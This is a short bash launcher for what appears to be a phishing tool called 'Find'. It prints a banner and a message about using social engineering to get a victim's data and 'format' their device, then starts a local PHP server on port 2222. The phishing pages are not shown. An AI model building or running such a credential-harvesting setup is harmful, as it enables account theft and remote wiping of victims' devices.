#!/bin/bash
function msg(){
echo # space
echo -e "\e[0m\e[1;34mForrat is used by my device find\e[0m"
echo -e "\e[0m\e[2mI don't know if it's a hacking method"
echo -e "but I could understand that if we use social engineering we could format a person"
echo -e "as he says, magic is very simple"
echo -e "we just have to be the victim give our data and uala, from victim to hacker\e[0m"
echo # space
}

function banner(){
echo " _____ _           _
|  ___(_)_ __   __| |
| |_  | |  _ \ / _  |
|  _| | | | | | (_| |
|_|   |_|_| |_|\__,_|"
}
function server(){
echo -e "\e[1;34m>\e[0m http://localhost:2222"
php -S localhost:2222 | grep "Server" | awk "{print $3}"  
}

banner
msg
server
